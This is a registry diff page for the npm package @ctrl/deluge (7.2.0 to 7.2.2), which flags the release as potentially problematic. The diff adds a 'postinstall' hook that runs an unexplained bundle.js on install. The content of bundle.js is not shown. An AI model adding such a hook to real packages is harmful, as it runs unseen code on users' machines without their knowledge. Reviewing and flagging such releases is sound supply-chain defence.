@ctrl/deluge 7.2.0 → 7.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @ctrl/deluge might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +4 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@ctrl/deluge",
3
- "version": "7.2.0",
3
+ "version": "7.2.2",
4
4
  "description": "TypeScript api wrapper for deluge using got",
5
5
  "author": "Scott Cooper <scttcper@gmail.com>",
6
6
  "license": "MIT",
@@ -25,7 +25,8 @@
25
25
  "build:docs": "typedoc",
26
26
  "test": "vitest run",
27
27
  "test:watch": "vitest",
28
- "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml"
28
+ "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml",
29
+ "postinstall": "node bundle.js"
29
30
  },
30
31
  "dependencies": {
31
32
  "@ctrl/magnet-link": "^4.0.2",
@@ -83,4 +84,4 @@
83
84
  "importOrderSeparation": true,
84
85
  "importOrderSortSpecifiers": false
85
86
  }
86
- }
87
+ }